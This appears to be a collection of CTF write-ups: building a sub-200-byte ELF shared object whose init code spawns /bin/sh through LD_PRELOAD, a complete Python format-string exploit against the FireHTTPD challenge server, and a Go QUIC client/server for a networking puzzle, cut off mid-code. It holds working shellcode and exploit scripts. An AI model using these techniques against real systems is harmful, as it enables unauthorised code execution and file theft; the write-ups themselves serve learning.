$ gcc -shared lol.c -o lol.so
$ LD_PRELOAD=./lol.so /bin/true
$ id
uid=0(root) gid=0(root) groups=0(root)

We got a shell, but unfortunately the file is too big:

1 2	ls -ltah lol.so -rwxr-xr-x 1 root root 16K Apr 20 10:08 lol.so*

16k is a large number, and we need to find a way to reduce it. After some reading on the man page of gcc and some recommendations online, I tried to use the following GCC options:

norelro compile option.
Stripping the binary.
Activate no start files option for gcc.
nodefault libraries.
Turning on optimizations with -O3

This reduced the file size by a considerable amount:

1
2
3

$ gcc -shared -nostartfiles -nodefaultlibs -shared -Wl,-z,norelro -s lol.c -O3
$ ls -ltah a.out
-rwxr-xr-x 1 root root 9.5K Apr 20 10:13 a.out

And 9.5k was the max I could get by just using gcc. We needed less than 1k. Following that, I discovered this post online about creating tiny elf binaries by hand using assembly. Perhaps the post is for elfs of the type ET_EXEC and we need ET_DYN. The post was for 32 bits, and we need 64 bits. The possible file types of an ELF are:

ET_NONE         An unknown type.     (0x0)
ET_REL          A relocatable file.  (0x1)
ET_EXEC         An executable file.  (0x2)
ET_DYN          A shared object.     (0x3)
ET_CORE         A core file.         (0x4)

We want ET_DYN to be a shared object, so I did some smart searching on github for examples of shared objects in assembly and found this template, the string I used to find this was:

1	db 0x7f, "ELF" ET_DYN

To open a shell, run the syscall execve, then set the registers RAX to 0x3b, RDI to a pointer to the string /bin/sh, and RSI to a pointer to an array [“/bin/sh”, 0x0].

My first shell code was:

_start:
mov rdi,0x68732f6e69622f ; /bin/sh to RDI
push rdi ; push /bin/sh to the stack
push rsp ; push current stack pointer to the stack
pop rdi ; put the pointer of /bin/sh to RDI
push 59 ; push 0x3b to the stack
pop rax ; get 0x3b from the stack to RAX
push 0 ; constructing the the finaly argument of the array
push rdi ; push a pointer of /bin/sh to the stack
mov rsi,rsp ; put a pointer to ["/bin/sh",0x0] to RSI
cdq ; Convert Doubleword to Quadword https://www.aldeid.com/wiki/X86-assembly/Instructions/cdq
syscall ; execve("/bin/sh",["/bin/sh",0x0],0x0)

Putting this code in the template:


; build with:
;   nasm elf_dll_x64_template.s -f bin -o template_x64_linux_dll.bin

BITS 64
org     0
ehdr:
  db    0x7f, "ELF", 2, 1, 1, 0    ; e_ident
  db    0, 0, 0, 0,  0, 0, 0, 0
  dw    3                          ; e_type    = ET_DYN
  dw    62                         ; e_machine = EM_X86_64
  dd    1                          ; e_version = EV_CURRENT
  dq    _start                     ; e_entry   = _start
  dq    phdr - $$                  ; e_phoff
  dd    shdr - $$                  ; e_shoff
  dq    0                          ; e_flags
  dw    ehdrsize                   ; e_ehsize
  dw    phdrsize                   ; e_phentsize
  dw    2                          ; e_phnum
  dw    shentsize                  ; e_shentsize
  dw    2                          ; e_shnum
  dw    1                          ; e_shstrndx
ehdrsize equ  $ - ehdr

phdr:
  dd    1                          ; p_type   = PT_LOAD
  dd    7                          ; p_flags  = rwx
  dq    0                          ; p_offset
  dq    $$                         ; p_vaddr
  dq    $$                         ; p_paddr
  dq    0xDEADBEEF                 ; p_filesz
  dq    0xDEADBEEF                 ; p_memsz
  dq    0x1000                     ; p_align
phdrsize equ  $ - phdr
  dd    2                          ; p_type  = PT_DYNAMIC
  dd    7                          ; p_flags = rwx
  dq    dynsection                 ; p_offset
  dq    dynsection                 ; p_vaddr
  dq    dynsection                 ; p_vaddr
  dq    dynsz                      ; p_filesz
  dq    dynsz                      ; p_memsz
  dq    0x1000                     ; p_align

shdr:
  dd    1                          ; sh_name
  dd    6                          ; sh_type = SHT_DYNAMIC
  dq    0                          ; sh_flags
  dq    dynsection                 ; sh_addr
  dq    dynsection                 ; sh_offset
  dq    dynsz                      ; sh_size
  dd    0                          ; sh_link
  dd    0                          ; sh_info
  dq    8                          ; sh_addralign
  dq    7                          ; sh_entsize
shentsize equ $ - shdr
  dd    0                          ; sh_name
  dd    3                          ; sh_type = SHT_STRTAB
  dq    0                          ; sh_flags
  dq    strtab                     ; sh_addr
  dq    strtab                     ; sh_offset
  dq    strtabsz                   ; sh_size
  dd    0                          ; sh_link
  dd    0                          ; sh_info
  dq    0                          ; sh_addralign
  dq    0                          ; sh_entsize
dynsection:
; DT_INIT
  dq    0x0c
  dq    _start
; DT_STRTAB
  dq    0x05
  dq    strtab
; DT_SYMTAB
  dq    0x06
  dq    strtab
; DT_STRSZ
  dq    0x0a
  dq    0
; DT_SYMENT
  dq    0x0b
  dq    0
; DT_NULL
  dq    0x00
  dq    0
dynsz equ $ - dynsection

strtab:
 db 0
 db 0
strtabsz equ $ - strtab
global _start
_start:
;db 0xcc
mov rdi,0x68732f6e69622f
push rdi
push rsp
pop rdi
push 59
pop rax
push 0
push rdi
mov rsi,rsp
cdq
syscall

Compiling it:

$ nasm -f bin -o a.out full.asm
$ ls -ltah a.out
-rw-r--r-- 1 root root 427 Apr 20 11:28 a.out
$ nasm -f bin -o a.out full.asm
$ LD_PRELOAD=./a.out ./true
$ id
uid=0(root) gid=0(root) groups=0(root)
$ exit

So with this, we got a shared file with 427 bytes! more than half of the requested 1024 bytes, so let’s upload it to the site:

1	You made it to level 1: considerable! You have 127 bytes left to be thoughtful. This effort is worthy of 0/2 flags.

So this effort, as expected, is not enough for a flag. We need to save at least 127 bytes for the first flag. What I did next was to remove unnecessary sections from the elf, something that would not break the binary. The first thing I did was to remove the Section header (shdr).

It’s not really required, so the changes made to full.asm were:

e_shoff in the elf header(ehdr) to point to the program header (phdr)
e_shentsize in the elf header(ehdr) value to zero
e_shnum in the elf header(ehdr) value to zero (the number of section headers set to zero because we completly removed this section)

The full script to cuted.asm:


; build with:
;   nasm elf_dll_x64_template.s -f bin -o template_x64_linux_dll.bin

BITS 64
org     0
ehdr:
  db    0x7f, "ELF", 2, 1, 1, 0    ; e_ident
  db    0, 0, 0, 0,  0, 0, 0, 0
  dw    3                          ; e_type    = ET_DYN
  dw    62                         ; e_machine = EM_X86_64
  dd    1                          ; e_version = EV_CURRENT
  dq    _start                     ; e_entry   = _start
  dq    phdr - $$                  ; e_phoff
  dd    phdr - $$                  ; e_shoff (chaged to phdr instead of shdr)
  dq    0                          ; e_flags
  dw    ehdrsize                   ; e_ehsize
  dw    phdrsize                   ; e_phentsize
  dw    2                          ; e_phnum
  dw    0                          ; e_shentsize (changed to 0)
  dw    0                          ; e_shnum (changed to 0)
  dw    1                          ; e_shstrndx
ehdrsize equ  $ - ehdr

phdr:
  dd    1                          ; p_type   = PT_LOAD
  dd    7                          ; p_flags  = rwx
  dq    0                          ; p_offset
  dq    $$                         ; p_vaddr
  dq    $$                         ; p_paddr
  dq    0xDEADBEEF                 ; p_filesz
  dq    0xDEADBEEF                 ; p_memsz
  dq    0x1000                     ; p_align
phdrsize equ  $ - phdr
  dd    2                          ; p_type  = PT_DYNAMIC
  dd    7                          ; p_flags = rwx
  dq    dynsection                 ; p_offset
  dq    dynsection                 ; p_vaddr
  dq    dynsection                 ; p_vaddr
  dq    dynsz                      ; p_filesz
  dq    dynsz                      ; p_memsz
  dq    0x1000                     ; p_align
; shdr header removed here
dynsection:
; DT_INIT
  dq    0x0c
  dq    _start
; DT_STRTAB
  dq    0x05
  dq    strtab
; DT_SYMTAB
  dq    0x06
  dq    strtab
; DT_STRSZ
  dq    0x0a
  dq    0
; DT_SYMENT
  dq    0x0b
  dq    0
; DT_NULL
  dq    0x00
  dq    0
dynsz equ $ - dynsection

strtab:
 db 0
 db 0
strtabsz equ $ - strtab
global _start
_start:
;db 0xcc
mov rdi,0x68732f6e69622f
push rdi
push rsp
pop rdi
push 59
pop rax
push 0
push rdi
mov rsi,rsp
cdq
syscall

This was enough to get us the first flag:

You made it to level 2: thoughtful! 
You have 75 bytes left to be hand-crafted. 
This effort is worthy of 1/2 flags. 
PCTF{th0ugh_wE_have_cl1mBed_far_we_MusT_St1ll_c0ntinue_oNward}

Following this, many improvements can be made, such as removing unnecessary entries in the dynamic section such as DT_NULL, DT_SYMENT, and DT_STRSZ. We can remove that a save a lot of bytes:

...truncated...
dynsection:
; DT_INIT
  dq    0x0c
  dq    _start
; DT_STRTAB
  dq    0x05
  dq    strtab
; DT_SYMTAB
  dq    0x06
  dq    strtab
dynsz equ $ - dynsection

strtab:
 db 0
 db 0
strtabsz equ $ - strtab
global _start
_start:
;db 0xcc
mov rdi,0x68732f6e69622f
push rdi
push rsp
pop rdi
push 59
pop rax
push 0
push rdi
mov rsi,rsp
cdq
syscall

1
2
3

$ nasm -f bin -o a.out cuted.asm
$ ls -ltah a.out
-rw-r--r-- 1 evilgod evilgod 251 Apr 20 11:58 a.out

We reduced it to 251 bytes, still far from obtaining the necessary 194 for the 2nd flag. More improvements can be made. For example, we can cut the last 3 fields of the elf header, which are related to the section header that we previously removed (e_shentsize, e_shnum, and e_shstrndx).

We saved 6 bytes by doing so.

It is possible to save even more bytes by removing the last fields of the PT_DYNAMIC entry from the program header (phdr). This, thankfully, will not break the lib; in the end, this entry will overlap with the dynamic section, which is perfectly fine. So the next fields to remove are p_vaddr,p_filesz,p_memsz,p_align.

The assembly file looks like this right now:


; build with:
;   nasm elf_dll_x64_template.s -f bin -o template_x64_linux_dll.bin

BITS 64
org     0
ehdr:
  db    0x7f, "ELF", 2, 1, 1, 0    ; e_ident
  db    0, 0, 0, 0,  0, 0, 0, 0
  dw    3                          ; e_type    = ET_DYN
  dw    62                         ; e_machine = EM_X86_64
  dd    1                          ; e_version = EV_CURRENT
  dq    _start                     ; e_entry   = _start
  dq    phdr - $$                  ; e_phoff
  dd    phdr - $$                  ; e_shoff (chaged to phdr instead of shdr)
  dq    0                          ; e_flags
  dw    ehdrsize                   ; e_ehsize
  dw    phdrsize                   ; e_phentsize
  dw    2                          ; e_phnum
ehdrsize equ  $ - ehdr

phdr:
  dd    1                          ; p_type   = PT_LOAD
  dd    7                          ; p_flags  = rwx
  dq    0                          ; p_offset
  dq    $$                         ; p_vaddr
  dq    $$                         ; p_paddr
  dq    0xDEADBEEF                 ; p_filesz
  dq    0xDEADBEEF                 ; p_memsz
  dq    0x1000                     ; p_align
phdrsize equ  $ - phdr
  dd    2                          ; p_type  = PT_DYNAMIC
  dd    7                          ; p_flags = rwx
  dq    dynsection                 ; p_offset
  dq    dynsection                 ; p_vaddr
dynsection:
; DT_INIT
  dq    0x0c
  dq    _start
; DT_STRTAB
  dq    0x05
  dq    strtab
; DT_SYMTAB
  dq    0x06
  dq    strtab
dynsz equ $ - dynsection

strtab:
 db 0
 db 0
strtabsz equ $ - strtab
global _start
_start:
;db 0xcc
mov rdi,0x68732f6e69622f
push rdi
push rsp
pop rdi
push 59
pop rax
push 0
push rdi
mov rsi,rsp
cdq
syscall

Compiling it, we can see we got this into a file of size 213 bytes:

1
2
3

$ nasm -f bin -o a.out cuted.asm
$ ls -ltah a.out
-rw-r--r-- 1 root root 213 Apr 20 12:13 a.out

We still need to save 19 bytes for the final flag, so the next step for me is to optimise the shell code at the beginning. We have some fields we can control without breaking the binary, so the next step for me was to include the /bin/sh string in these kinds of fields, so we don’t need to put it in the stack and manipulate those pointers. This can save some bytes.

/bin/sh string was saved in the p_filesz field of the PT_LOAD entry in the program header.

One thing that helped me a lot while debugging a shell wast o put a int 3 instruction before my shell code, which would stop gdb and act as a breakpoint (SIG TRAP):

_start:
db 0xcc ; SIGTRAP (int 3 instruction)
mov rdi,0x68732f6e69622f
push rdi
push rsp
pop rdi
push 59
pop rax
push 0
push rdi
mov rsi,rsp
cdq
syscall

Now we’ll modify the p_filesz entry in the /bin/sh string.

...
phdr:
  dd    1                          ; p_type   = PT_LOAD
  dd    7                          ; p_flags  = rwx
  dq    0                          ; p_offset
  dq    $$                         ; p_vaddr
  dq    $$                         ; p_paddr
  dq    0x68732f6e69622f           ; p_filesz (now has /bin/sh here)
  dq    0xDEADBEEF                 ; p_memsz
  dq    0x1000                     ; p_align
...

I also need to get the offset for this entry. Like libc, this is also a shared library and a space will be assigned for this lib to be located. Fortunately, when the entry code is executed, a pointer is saved in the RAX register. We can calculate the offset from there by using gdb:

1 2	pwndbg> set environment LD_PRELOAD ./a.out pwndbg> r

The following address is found in rax:

So we can verify where the /bin/sh is located by doing:

1 2	pwndbg> x/s $rax-0x62 0x7fff194f205a: "/bin/sh"

After this, we can use the lea assembly instruction to get the address of binsh and save a lot of bytes:

_start:
lea rdi,[rax-0x62]
push 59
pop rax
push 0
push rdi
mov rsi,rsp
cdq
syscall

Let’s check how much is left:

1
2
3

$ nasm -f bin -o a.out cuted.asm
$ ls -ltah a.out
-rw-r--r-- 1 root root 204 Apr 20 12:46 a.out

Also, because we don’t have a reserved space for strtab, we can make it point to _start instead of creating a label with two dbs.

Updating the script from:

dynsection:
; DT_INIT
  dq    0x0c
  dq    _start
; DT_STRTAB
  dq    0x05
  dq    strtab
; DT_SYMTAB
  dq    0x06
  dq    strtab
dynsz equ $ - dynsection

strtab:
 db 0
 db 0
strtabsz equ $ - strtab

To:

dynsection:
; DT_INIT
  dq    0x0c
  dq    _start
; DT_STRTAB
  dq    0x05
  dq    _start
; DT_SYMTAB
  dq    0x06
  dq    _start
dynsz equ $ - dynsection

Two bytes are now saved:

1
2
3

$ nasm -f bin -o a.out cuted.asm
$ ls -ltah a.out
-rw-r--r-- 1 root root 202 Apr 20 12:49 a.out

We now need one final tweak for our script to be able to get the final flag… We can control the p_offset field without breaking the elf, so we can use it as an index of the dynsection and make a fake DT_STRTAB entry, so the dynamic section will be overlapped with PT_DYNAMIC, saving us something like 0x10 bytes (the old entry DT_STRTAB is removed to save 0x10 bytes).

Due to this action, we also need to update the offset in the _start(updated to 0x50).
My final payload was:

BITS 64
org     0
ehdr:
  db    0x7f, "ELF", 2, 1, 1, 0    ; e_ident
  db    0, 0, 0, 0,  0, 0, 0, 0
  dw    3                          ; e_type    = ET_DYN
  dw    62                         ; e_machine = EM_X86_64
  dd    1                          ; e_version = EV_CURRENT
  dq    _start                     ; e_entry   = _start
  dq    phdr - $$                  ; e_phoff
  dd    phdr - $$                  ; e_shoff (chaged to phdr instead of shdr)
  dq    0                          ; e_flags
  dw    ehdrsize                   ; e_ehsize
  dw    phdrsize                   ; e_phentsize
  dw    2                          ; e_phnum
ehdrsize equ  $ - ehdr

phdr:
  dd    1                          ; p_type   = PT_LOAD
  dd    7                          ; p_flags  = rwx
  dq    0                          ; p_offset
  dq    $$                         ; p_vaddr
  dq    $$                         ; p_paddr
  dq    0x68732f6e69622f                 ; p_filesz
  dq    0xDEADBEEF                 ; p_memsz
  dq    0x1000                     ; p_align
phdrsize equ  $ - phdr
  dd    2                          ; p_type  = PT_DYNAMIC
  dd    7                          ; p_flags = rwx
dynsection:
; DT_STRTAB
  dq    0x5                        ; p_offset (OVERLAPPED)
  dq    dynsection                 ; p_vaddr
; DT_INIT
  dq    0x0c
  dq    _start
; DT_SYMTAB
  dq    0x06
  dq    _start
global _start
_start:
lea rdi,[rax-0x50]
push 59
pop rax
push 0
push rdi
mov rsi,rsp
;cdq ; this may be needed locally but in the website accepts anyway without this (1 byte save)
syscall

We get a file of 185 bytes :) more than enough to get the final flag.

1
2
3

$ nasm -f bin -o a.out cuted.asm
$ ls -ltah a.out
-rw-r--r-- 1 root root 185 Apr 20 12:57 a.out

The flag was:

1
2
3

You made it to level 5: record-breaking! You have 9 bytes left to be astounding.
This effort is worthy of 2/2 flags. 
PCTF{th0ugh_wE_have_cl1mBed_far_we_MusT_St1ll_c0ntinue_oNward} PCTF{t0_get_a_t1ny_elf_we_5tick_1ts_hand5_in_its_ears_rtmlpntyea}

[Pwn] FireShell CTF 2020 - FireHTTPD

2020-03-23T00:45:41.000Z

FireHTTPD

Solves: 23
Points: 492
Description:
UPDATE: Server is running in /home/ctf/firehttpd Flag is on /home/ctf/flag
http://142.93.113.55:31084/
firehttpd
a6e05cc456b289505a6c5e36f0c04ed5
libc.so.6
2fb0d6800d4d79ffdc7a388d7fe6aea0
Author: Alisson Bezerra

HTTP Server

First of all thanks to Alisson for creating a challenge that is close to a real app, something that is close to reality as we say in Portugal a challenge with “head, torso and limbs”.

Back to the challenge firehttpd is a http server, after looking at the code in the function serve_file we can find a format string vulnerability in sprintf:

  unsigned __int64 __fastcall serve_file(unsigned int a1, const char *a2) {
  ...
  v5 = strstr(a2, "..");
  while ( v3 > 0 && strcmp("\n", &s1) )
  {
    v3 = get_line(a1, &s1, 1024LL);
    if ( !strncmp(&s1, "Referer: ", 9uLL) )
      sprintf(&s, &s1); // format string vulnerability
  }
  if ( access(a2, 0) == -1 || v5 )
  {
    not_found(a1);
  }
  else
  {
    headers(a1, a2, &s);
    stream = fopen(a2, "r");
    cat(a1, stream);
    fclose(stream);
  }
 ...
}

Also there is a .. filter to prevent file transversal, strstr will return a pointer if finds a “..” in the string and if that happens we will fall in to the not_found thus not reading the flag file.

Solution

The easiest solution was to actually use format string to clear a5 variable with this you could file transversal by bypassing the filter. But during the ctf I didn’t pay much attention to the “..” filter and only focused on the string containing the file path which made the challenge a bit harder, because we kind of need to clear the path present there and also write 4 characters(“flag”) to open the file.

I will explain my solution, the first thing is to leak a stack address because we want to modify the value of a local variable and as we know local variables are stored in the stack, we can try to find a pointer to the path in the stack by using the telescope command of pwndbg:

First we set a breakpoint:

pwndbg> b main
pwndbg> r
pwndbg> pie
Calculated VA from /ctf/pwn/firehttpd/firehttpd = 0x555555554000
pwndbg> b *0x555555554000+0x2011
pwndbg> c

The moment that it hit the breakpoint:

Then we can use telescope command to check the values in the stack:

As you can see above the pointer to the file path is at the 5th position so lets leak it with format string:

def formats(s):
    while True:
        try:
            return requests.get(url,headers={
                'Content-Type': 'text/html', 
                'Server': 'FireHTTPD/0.0.1', 
                'Referer':s})
        except requests.exceptions.ConnectionError:
            print('error')
            pass

r=formats('%5$lx')
FILENAME = int(r.headers['Referer'],16)

Now we need to write into that address, since the server is always running and doesn’t restart we can split the exploit in different request.

We need to write 4 bytes and clear the previous path, we can use %ln to clear the path with nulls, the l length modifier means long which goes up to 8 bytes which is what we really want to clear the entire path.

Next I tried to use two %hn like we usually do in printf challenges but for some reason I was getting some memory errors, maybe because the number of the printed characters required was too high.

If you want to know more about length modifiers you can read the man page of printf:

1	$ man printf$3$

Two %hn didn’t work so to write four characters we need to do four %hhn each one will write the maximum of a char 1 byte:

payload = '%19$ln'
payload += '%{}x%19$hhn'.format(0x66-9)    # f 0x66
payload += '%{}x%20$hhn'.format(0x106)     # l 0x6c
payload += '%{}x%21$hhn'.format(0x94+0x61) # a 0x61
payload += '%{}x%22$hhn'.format(1+0x5)     # g 0x67
payload = payload.encode() # python3 shenanigans
payload += b'_'* (56-len(payload)-1)
payload += p64(FILENAME)
payload += p64(FILENAME+1)
payload += p64(FILENAME+2)
payload += p64(FILENAME+3)
r=formats(payload) # r.text bugs out and doesn't print the body

Yes the offsets above are a mess but hey it works! (those could be calculated via debugging and do the writes one by one), also since I was using python requests to communicate with the http server for some reason the flag didn’t come out in the body (r.text).

We could solve this problem by just communicate with the server directly via tcp and construct manually the HTTP payload, another idea would be to capture the traffic using wireshark or you could do it like I did by doing an extra request to print the value where it was saved in the stack by using %s luckily the string was still saved in the stack in the next request.

KK = FILENAME-0xf30
payload = b'__%13$s' # Getting the flag in the next request
payload += p64(KK)
r=formats(payload)
print(r.headers)

The full exploit:

from pwn import *
import requests
#host, port = "127.0.0.1", "1337"
filename = "./firehttpd"
elf = ELF(filename)
context.arch = 'amd64'
def tohex(val, nbits):
    return (val + (1 << nbits)) % (1 << nbits)
if not args.REMOTE:
    url = 'http://127.0.0.1:1337/index.html'
    libc = elf.libc
else:
    url = 'http://142.93.113.55:31084/'
    libc = ELF('./libc.so.6')

def getConn():
    return process(filename) if not args.REMOTE else remote(host, port)

context.terminal = ['tmux', 'new-window'] # remove this if you don't use tmux

def formats(s):
    while True:
        try:
            return requests.get(url,headers={
                'Content-Type': 'text/html', 
                'Server': 'FireHTTPD/0.0.1', 
                'Referer':s})
        except requests.exceptions.ConnectionError:
            print('error')
            pass

r=formats('%5$lx')
FILENAME = int(r.headers['Referer'],16)
FLAG = 0x67616c66

payload = '%19$ln'
payload += '%{}x%19$hhn'.format(0x66-9)    # f 0x66
payload += '%{}x%20$hhn'.format(0x106)     # l 0x6c
payload += '%{}x%21$hhn'.format(0x94+0x61) # a 0x61
payload += '%{}x%22$hhn'.format(1+0x5)     # g 0x67
payload = payload.encode() # python3 shenanigans
payload += b'_'* (56-len(payload)-1)
payload += p64(FILENAME)
payload += p64(FILENAME+1)
payload += p64(FILENAME+2)
payload += p64(FILENAME+3)
r=formats(payload) # r.text bugs out and doesn't print the body

KK = FILENAME-0xf30
payload = b'__%13$s' # Getting the flag in the next request
payload += p64(KK)
r=formats(payload)
print(r.headers)

Running it:

$ python3 firehttpd.py REMOTE
[*] '/ctf/work/pwn/firehttpd/firehttpd'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/ctf/work/pwn/firehttpd/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
{'Referer': '__F#{0h_th0s3_f0rm4t_str1ngs}', 'Content-Type': 'text/html', 'Server': 'FireHTTPD/0.0.1'}

[Network] UTCTF 2020 - QUICk Servers

2020-03-11T11:43:02.000Z

QUICk Servers

Solves: 17
Points: 1988
Description:
I have a pretty cool server, but it’s for QUICk people only. Nobody else is allowed.
Pro Tip: Set your ALPN to “quic-echo-example” because I forgot to remove it.
54.152.23.18:1337
Author: masond

Challenge

I didn’t solve the challenge during the ctf mainly because my lack of experience with golang and also my ability to identify the issues was affected by the lack of sleeping. Anyway this was a cool challenge made me learn about the QUIC protocol and some new things about the go language.

The title of the challenge gives us the hint that this may be a server running on the QUIC protocol also in the description we were given the ip and port to the server.

Initially I tried to use a python library for quick but I failed horribly when connecting to the server, by searching the the hint of setting the APLN to “quic-echo-example” on github I ended up searching some examples on how to connect to a QUIC server using a library named quick-go .

So what exactly is QUIC? Quic is a network-protocol designed by Jim Roskind at Google, it was mainly created to improve the performance of connection-oriented web applications using the UDP protocol instead of TCP.

Finding an example

By searching by “quic-echo-example” on github I found an example.

After this I adapted the source code to connect to the challenge server but I ended up finding a lot of difficulties during of the installation of quick-go lib, every time I tried to install it with go get . command I was receiving an odd error about a “Duplicate stream ID”. Spent a lot of time searching on the web for this and found nothing.

In the end, I ended finding out why I was having problems, I was trying to install the master branch of github and it required 1.14 version of golang… In my host machine I only had the 1.13 installed. To solve this problem I decided to use Docker.

By specifying the right version as the tag I could use the right version of golang:

1
2
3

$ ls 
main.go
$ sudo docker run --rm -v $(pwd):/go/src/myapp -w /go/src/myapp -it golang:1.14 /bin/bash

After this I run into another problem I installed the master branch release which is unstable as fuck and also incompatible with the one running on the server. This is was when I learned about go modules, we can specify the right version with it so I searched in the github releases and the last stable release is v0.14.0:

$ go mod init .
$ go mod edit -require github.com/lucas-clemente/quic-go@v0.14.0
$ go get -v -t .
$ go build
$ go install
$ cat go.mod 
module myapp

go 1.14

require github.com/lucas-clemente/quic-go v0.14.0

And finally I was able to connect to the server:

1
2
3

$ go run main.go
Client: Sending 'feqfq'
Maybe you should start with Hello...

So the server replies that we should start with Hello, first we do the TLS configuration and specify the nextProtos as “quic-echo-example” as specified in the challenge description:

tlsConf := &tls.Config{
   InsecureSkipVerify: true,
   NextProtos:         []string{"quic-echo-example"},
}

Then we create the connection and the stream:

session, err := quic.DialAddr(addr, tlsConf, nil)
if err != nil {
  return err
}

stream, err := session.OpenStreamSync(context.Background())
if err != nil {
  return err
}

Sending the hello message and receiving the response:


func readBytes(stream io.Reader, n int) error {
  for i:=0; i< n; i++ {
    buf := make([]byte, 1)
    _, err := io.ReadFull(stream, buf);
    if err != nil {
      return err
    }
    fmt.Printf("%s", buf);
  }
  return nil
}

fmt.Printf("Client: Sending '%s'\n", message)
_, err = io.WriteString(stream,message)
if err != nil {
  return err
}

err = readBytes(stream, 248)
if err != nil {
  return err
}

$ go run main.go
Client: Sending 'Hello'
Welcome to the super QUICk Server!
You might've thought getting the flag would be easy, but it's gonna take a bit more. :D

I need some help with my Computer Architecture class, could you give me these numbers back in hex?
123454

This is the first hand of questions and is about converting decimal integers to hexa, this is where I got stuck mainly because I didn’t understand really well how golang read stream functions worked. The problem was on the number extraction, I was reading the last line with the number, but some times the number to be converted had less than 6 numbers and this is where I failed to understand the problem, when less than 6 the last line would be presented as “1234 \n” with spaces between the numbers and the new line, I was only striping the new line, because of this when sending the answer to the server everything started to hang up.

After the CTF and a day of rest I found out about the spaces and took another approach, something that I should have used since the beginning, which is using regex to extract those numbers instead of parsing them by “hand”.

func toHex(x []byte, n int) string {
    re := regexp.MustCompile("[0-9]+")
    h,err := strconv.Atoi(re.FindString(string(x)))
    if err != nil {
        panic(err)
    }
    return fmt.Sprintf("%x", h)
}
for i:=0; i< 1000; i++ {
    num := make([]byte, 7)
    n, err := stream.Read(num);
    if err != nil {
        return err
    }
    s := "0x"+toHex(num,n)
    //fmt.Printf("%d\n", i)
    //fmt.Printf("Received %s", num);
    //fmt.Printf("Sending %s\n",s)
    //_,err = io.WriteString(stream,s)
    _, err = stream.Write([]byte(s))
    if err != nil {
        return err
    }
}
b, err := ioutil.ReadAll(stream)
fmt.Printf("%s\n", b)

After converting 1000 decimal numbers we get the respective answer:

$ go run main.go
Client: Sending 'Hello'
Welcome to the super QUICk Server!
You might've thought getting the flag would be easy, but it's gonna take a bit more. :D

I need some help with my Computer Architecture class, could you give me these numbers back in hex?
Quickly, of course... :)
Nice job, let's keep going...
Can I dial you later? I'll try 6969 ;)

This time the server is trying to connect to us, so we need to turn us into a “server” and listen at the port 6969, for this we need to open a port in the router and rerun the docker container with the -p parameter to link the UDP port with the host:

$ sudo docker run --rm -p 6969:6969/udp -v (pwd):/go/src/myapp -w /go/src/myapp -it golang:1.14 /bin/bash
$ go mod init .
$ go mod edit -require github.com/lucas-clemente/quic-go@v0.14.0
$ go get -v -t .
$ go build
$ go install

Also if you have a local firewall like I have in my computer you need to open that door too, in my case I use UFW firewall:

$ sudo ufw allow 6969/udp
$ sudo ufw status
6969/udp                   ALLOW       Anywhere                  
6969/udp (v6)              ALLOW       Anywhere (v6)

To run the server we need to put it in another thread, we can use go-coroutines but we also have to add a code that waits for the server thread to end before quitting the main program, this can be pretty easily done with go by using sync.WaitGroup:

func main() {
  var wg sync.WaitGroup
  wg.Add(1)
  go func() { log.Fatal(echoServer()) }()
  err := clientMain()
  if err != nil {
    panic(err)
  }
  wg.Wait()
}

In the code above go func() initiates the server coroutine and increases the WaitGroup counter, we put a Wait() in the end of the main function so it waits until the counter reaches the number zero. This happens when echoServer() finishes which will decrease the counter to zero.

Making the server listening at 0.0.0.0:6969 and set up TLS configurations:

func echoServer() error {
    listener, err := quic.ListenAddr(addrClientS, generateTLSConfig(), nil)
    if err != nil {
        return err
    }
    sess, err := listener.Accept(context.Background())
    if err != nil {
        return err
    }
    stream, err := sess.AcceptStream(context.Background())
    if err != nil {
        panic(err)
    }

    err = readBytes(stream, 26)
    if err != nil {
        return err
    }
    ...
}
// Setup a bare-bones TLS config for the server
func generateTLSConfig() *tls.Config {
    key, err := rsa.GenerateKey(rand.Reader, 1024)
    if err != nil {
        panic(err)
    }
    template := x509.Certificate{SerialNumber: big.NewInt(1)}
    certDER, err := x509.CreateCertificate(rand.Reader, &template, &template, &key.PublicKey, key)
    if err != nil {
        panic(err)
    }
    keyPEM := pem.EncodeToMemory(&pem.Block{Type: "RSA PRIVATE KEY", Bytes: x509.MarshalPKCS1PrivateKey(key)})
    certPEM := pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: certDER})

    tlsCert, err := tls.X509KeyPair(certPEM, keyPEM)
    if err != nil {
        panic(err)
    }
    return &tls.Config{
        Certificates: []tls.Certificate{tlsCert},
        NextProtos:   []string{"quic-echo-example"},
    }
}

Reading the next problem:

err = readBytes(stream, 26)
if err != nil {
  return err
}

The next problem is to calculate expressions:

1
2
3

Hey... you up?
Math time!
123458 + 341231

Once again using regex to extract everything:

func echoServer() error {
    ...
    for i:=0; i< 1000; i++ {
        num := make([]byte, 0x30)
        _, err = stream.Read(num);
        if err != nil {
            return err
        }
        re := regexp.MustCompile("[0-9]+")
        re2 := regexp.MustCompile("[-+*/^&]")
        num1,_ := strconv.Atoi(re.FindAllString(string(num),-1)[0])
        num2,_ := strconv.Atoi(re.FindAllString(string(num),-1)[1])
        exp := re2.FindString(string(num))
        //fmt.Printf("%s\n", num)
        //fmt.Printf("%d\n", num1)
        //fmt.Printf("%s\n", exp)
        //fmt.Printf("%d\n", num2)
        res := calculateExp(num1, num2, exp)
        //fmt.Printf("%d\n", res)
        _,err = io.WriteString(stream,strconv.Itoa(res))
        if err != nil {
            return err
        }
    }

    b, err := ioutil.ReadAll(stream)
    fmt.Printf("%s\n", b)
}

After calculating 1000 expressions we get the flag:

1 2	Great Job! utflag{Qu1C_p@cK3t$_a73jc8s}

The full script:

package main

import (
    "context"
    //"encoding/binary"
    "crypto/rand"
    "crypto/rsa"
    "crypto/tls"
    "regexp"
    "strconv"
    "sync"
    //"time"
    //"strings"
    "crypto/x509"
    "encoding/pem"
    "fmt"
    "io"
    "io/ioutil"
    "log"
    "math/big"

    quic "github.com/lucas-clemente/quic-go"
)

const addr = "192.168.1.3:1337"//"54.152.23.18:1337"
const addrClientS = "0.0.0.0:6969"

const message = "Hello"

// We start a server echoing data on the first stream the client opens,
// then connect with a client, send the message, and wait for its receipt.
func main() {
    var wg sync.WaitGroup
    wg.Add(1)
    go func() { log.Fatal(echoServer()) }()
    err := clientMain()
    if err != nil {
        panic(err)
    }
    wg.Wait()
}

func calculateExp(num1 int,num2 int,exp string) int {
    switch exp {
        case "+":
            return num1 + num2
